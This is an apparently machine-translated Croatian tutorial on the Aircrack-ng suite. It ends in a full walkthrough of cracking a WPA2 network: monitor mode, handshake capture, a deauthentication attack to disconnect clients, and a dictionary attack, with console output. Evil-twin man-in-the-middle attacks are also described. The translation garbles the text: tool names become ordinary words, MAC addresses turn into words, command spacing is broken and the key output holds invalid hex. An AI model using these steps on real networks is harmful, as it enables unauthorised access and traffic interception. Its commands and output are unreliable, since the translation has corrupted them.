Kako koristiti Aircrack-ng

How Use Aircrack Ng

U većini slučajeva ljudi nikada ne razmišljaju o mreži na koju su povezani. Nikada ne pomisle koliko je ta mreža sigurna i koliko svakodnevno riskiraju svoje povjerljive podatke. Možete provjeriti ranjivost na svojim WiFi mrežama pomoću vrlo moćnog alata tzv Aircrack-ng i Wireshark. Wireshark se koristi za praćenje mrežnih aktivnosti. Aircrack-ng više je poput agresivnog alata koji vam omogućuje hakiranje i pristup bežičnim vezama. Razmišljanje kao uljez oduvijek je bio najsigurniji način da se zaštitite od hakiranja. Možda ćete moći shvatiti točne radnje koje će uljez poduzeti da dobije pristup vašem sustavu tako što će naučiti o zrakoplovu. Zatim možete provesti provjeru usklađenosti na svom sustavu kako biste bili sigurni da nije nesiguran.

Aircrack-ng je potpuni skup softvera osmišljenog za testiranje sigurnosti WiFi mreže. To nije samo jedan alat, već zbirka alata od kojih svaki ima određenu svrhu. Može se raditi na različitim područjima WiFi zaštite, poput praćenja pristupne točke, testiranja, napada na mrežu, pucanja wifi mreže i testiranja. Ključni cilj Aircracka je presretanje paketa i dešifriranje raspršivača radi razbijanja lozinki. Podržava gotovo sva nova bežična sučelja. Aircrack-ng je poboljšana verzija zastarjelog paketa alata Aircrack, ng se odnosi na Nova generacija . Neki od izvrsnih alata koji zajedno rade na preuzimanju većeg zadatka.



Airmon:

Airmon-ng je uključen u aircrack-ng komplet koji postavlja mrežno sučelje u način rada monitora. Mrežne kartice obično prihvaćaju samo pakete koji su za njih definirani prema MAC adresi mrežne kartice, ali uz airmon-ng prihvatit će se i svi bežični paketi, bili oni ciljani na njih ili ne. Trebali biste moći uhvatiti ove pakete bez povezivanja ili provjere autentičnosti s pristupnom točkom. Koristi se za provjeru statusa pristupne točke stavljanjem mrežnog sučelja u način rada monitora. Prvo morate konfigurirati bežične kartice za uključivanje načina rada monitora, a zatim ubiti sve pozadinske procese ako mislite da ih neki proces ometa. Nakon završetka procesa, način rada monitora može se omogućiti na bežičnom sučelju pokretanjem naredbe u nastavku:



[zaštićena e -pošta]: ~ $sudoairmon-ng start wlan0#

Način monitora također možete onemogućiti tako da u bilo kojem trenutku zaustavite airmon-ng pomoću naredbe u nastavku:

[zaštićena e -pošta]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Airodump-ng se koristi za popis svih mreža koje nas okružuju i za pregled vrijednih informacija o njima. Osnovna funkcionalnost airodump-ng je njuškanje paketa, pa je u osnovi programirano da zgrabi sve pakete oko nas dok se stavlja u način rada monitora. Pokrenut ćemo sve veze oko nas i prikupiti podatke poput broja klijenata spojenih na mrežu, njihovih odgovarajućih mac adresa, stila šifriranja i naziva kanala, a zatim ćemo početi ciljati našu ciljnu mrežu.

Upisom naredbe airodump-ng i davanjem imena mrežnog sučelja kao parametra, možemo aktivirati ovaj alat. Navest će sve pristupne točke, količinu paketa podataka, korištene metode šifriranja i provjere autentičnosti te naziv mreže (ESSID). S hakerskog gledišta, mac adrese su najvažnija polja.

[zaštićena e -pošta]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack se koristi za razbijanje lozinki. Nakon snimanja svih paketa pomoću airodumpa, možemo razbiti ključ zrakoplovom. Razbija te tipke pomoću dvije metode PTW i FMS. Pristup PTW -a odvija se u dvije faze. U početku se koriste samo ARP paketi, a tek onda, ako ključ nije napuknut nakon pretraživanja, koristi sve ostale zarobljene pakete. Prednost PTW pristupa je što se svi paketi ne koriste za krekiranje. U drugom pristupu, tj. FMS -u, za razbijanje ključa koristimo i statističke modele i alge grube sile. Također se može koristiti rječnička metoda.

Zračna predstava:

Airplay-ng uvodi pakete u bežičnu mrežu radi stvaranja ili ubrzavanja prometa. Aireplay-ng može uhvatiti pakete iz dva različita izvora. Prva je živa mreža, a druga su paketi iz već postojeće pcap datoteke. Airplay-ng koristan je tijekom napada deautentifikacije koji cilja bežičnu pristupnu točku i korisnika. Štoviše, neke napade možete izvesti poput napada kave s kavom s airplay-ng-om, alatom koji vam omogućuje da dobijete ključ iz klijentovog sustava. To možete postići hvatanjem ARP paketa, a zatim manipuliranjem i slanjem natrag u sustav. Klijent će tada stvoriti paket koji se može uhvatiti airodumpom i zrakoplov ispucati ključ iz tog izmijenjenog paketa. Neke druge opcije napada airplay-ng-a uključuju chopchop, reprodukciju fragmenata itd.

Zračna baza:

Airbase-ng koristi se za pretvaranje računala uljeza u kompromitiranu točku veze s kojom se drugi mogu povezati. Korištenjem Airbase-ng-a možete tvrditi da ste legalna pristupna točka i provoditi napade tipa 'čovjek-u-sredini' na računala koja su spojena na vašu mrežu. Takve vrste napada nazivaju se Zli blizanački napadi. Osnovni korisnici ne mogu razlikovati legalnu pristupnu točku od lažne pristupne točke. Dakle, prijetnja zlim blizancem jedna je od najugroženijih bežičnih prijetnji s kojima se danas suočavamo.

Airolib-ng:

Airolib ubrzava proces hakiranja spremanjem i upravljanjem popisima lozinki i pristupnom točkom. Sustav za upravljanje bazama podataka koji koristi ovaj program je SQLite3, koji je uglavnom dostupan na svim platformama. Krekiranje lozinke uključuje proračun parnog glavnog ključa kroz koji se izdvaja privatni prijelazni ključ (PTK). Pomoću PTK -a možete odrediti identifikacijski kod okvirne poruke (MIC) za dati paket i teoretski pronaći da je MIC sličan paketu, pa ako je PTK bio u pravu, i PMK je bio u pravu.

Da biste vidjeli popise lozinki i pristupne mreže pohranjene u bazi podataka, upišite sljedeću naredbu:

[zaštićena e -pošta]: ~ $sudoairolib-ng testdatabase –stats

Ovdje je testdatabase db kojem želite pristupiti ili ga stvoriti, a –stats je operacija koju želite izvesti na njemu. Možete izvršiti više operacija na poljima baze podataka, poput davanja maksimalnog prioriteta nekom SSID -u ili nečemu sličnom. Da biste koristili airolib-ng s aircrack-ng, unesite sljedeću naredbu:

[zaštićena e -pošta]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Ovdje koristimo već izračunate PMK -ove pohranjene u testna baza podataka za ubrzanje procesa razbijanja lozinke.

Krekiranje WPA/WPA2 pomoću Aircrack-a:

Pogledajmo mali primjer onoga što aircrack-ng može učiniti uz pomoć nekoliko svojih sjajnih alata. Razbit ćemo unaprijed dijeljeni ključ WPA/WPA2 mreže metodom rječnika.

Prvo što moramo učiniti je navesti mrežna sučelja koja podržavaju način rada monitora. To se može učiniti pomoću sljedeće naredbe:

[zaštićena e -pošta]: ~ $sudoairmon-ng

Skup čipova upravljačkog programa sučelja PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Možemo vidjeti sučelje; sada moramo staviti mrežno sučelje koje smo pronašli (wlx0) u način rada monitora pomoću sljedeće naredbe:

[zaštićena e -pošta]: ~ $sudoairmon-ng start wlx0

Omogućio je način rada monitora na sučelju zvanom wlx0mon .

Sada bismo trebali početi slušati emisije s obližnjih usmjerivača putem mrežnog sučelja koje smo prebacili u način rada monitora.

[zaštićena e -pošta]: ~ $sudoairodump-ng wlx0mon

CH5 ][Proteklo:30s][ 2020. godine-12-02 00:17



BSSID PWR svjetionici#Podaci, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Četiri pet 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:BITI-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: DAJE:88:FA:38: 02-68 28 2 0 jedanaest54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Sonda



E4: 6F:13: 04: CE:315C: 3A:Četiri pet: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31PRIJE KRISTA:91: B5: F8: 7E: D5 -390e-1 1002 13

Naša ciljna mreža je Crackit u ovom slučaju, koji se trenutno izvodi na kanalu 1.

Ovdje da bismo razbili lozinku za ciljanu mrežu, moramo snimiti 4-smjerno rukovanje, što se događa kada se uređaj pokuša povezati s mrežom. Možemo ga snimiti pomoću sljedeće naredbe:

[zaštićena e -pošta]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -u /dom wlx0

-c : Kanal

–Bss : Bssid ciljne mreže

-u : Naziv direktorija u koji će se postaviti pcap datoteka

Sada moramo pričekati da se uređaj spoji na mrežu, ali postoji bolji način za hvatanje rukovanja. Uređaje možemo deaktivirati autentifikacijom pomoću napada deautentifikacijom pomoću sljedeće naredbe:

[zaštićena e -pošta]: ~ $sudoaireplay-ng-0 -doE4: 6F:13: 04: CE:31

do : Bssid ciljne mreže

-0 : napad deautentifikacije

Isključili smo sve uređaje i sada moramo čekati da se uređaj spoji na mrežu.

CH1 ][Proteklo:30s][ 2020. godine-12-02 00:02][WPA rukovanje: E4: 6F:13: 04: CE:31



BSSID PWR RXQ svjetionici#Podaci, #/s CH MB ENC CIFFER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154. WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Sonda



E4: 6F:13: 04: CE:31PRIJE KRISTA:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Četiri pet: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Dobili smo pogodak, a gledajući u gornji desni kut odmah do vremena, možemo vidjeti da je stisak ruke uhvaćen. Sada pogledajte u navedenu mapu ( /Dom u našem slučaju) za a .pcap datoteka.

Kako bismo razbili WPA ključ, možemo upotrijebiti sljedeću naredbu:

[zaštićena e -pošta]: ~ $sudoaircrack-ng-a2 -urockyou.txt-bE4: 6F:13: 04: CE:31rukovanje.kapa

b: Bssid ciljne mreže

-a2: WPA2 način rada

Rockyou.txt: Rječnikdatotekarabljeno

Rukovanje.cap: Thedatoteka kojisadrži snimljeno rukovanje

Aircrack-ng1.2beta3

[00:01:49] 10566ključevi testirani(1017.96do/s)

KLJUČNO NAĐENO! [imaš me]

Glavni ključ: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FpedesetC


Prijelazni ključ: 4D C4 5R 6T76 996G 7H 8D EZ

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FpedesetC025 62E9 5D71

Ključ naše ciljne mreže uspješno je probijen.

Zaključak:

Bežične mreže su posvuda, koriste ih sve tvrtke, od radnika koji koriste pametne telefone do industrijskih upravljačkih uređaja. Prema istraživanju, gotovo 20 posto internetskog prometa bit će preko WiFi -a 2021. Bežične mreže imaju mnoge prednosti, komunikacija izvan vrata, brz pristup internetu na mjestima gdje je gotovo nemoguće postaviti žice, može proširiti mrežu bez postavljanja kabela za bilo kojeg drugog korisnika i može jednostavno povezati vaše mobilne uređaje s kućnim uredima dok niste tamo.

Unatoč tim prednostima, postoji veliki znak pitanja o vašoj privatnosti i sigurnosti. Kao ove mreže; U dometu odašiljača usmjerivači su otvoreni za svakoga, lako ih se može napasti, a vaši podaci mogu biti ugroženi. Na primjer, ako ste spojeni na neki javni Wi -Fi, svatko spojen na tu mrežu može lako provjeriti vaš mrežni promet pomoću neke inteligencije i uz pomoć sjajnih dostupnih alata, pa ga čak i izbrisati.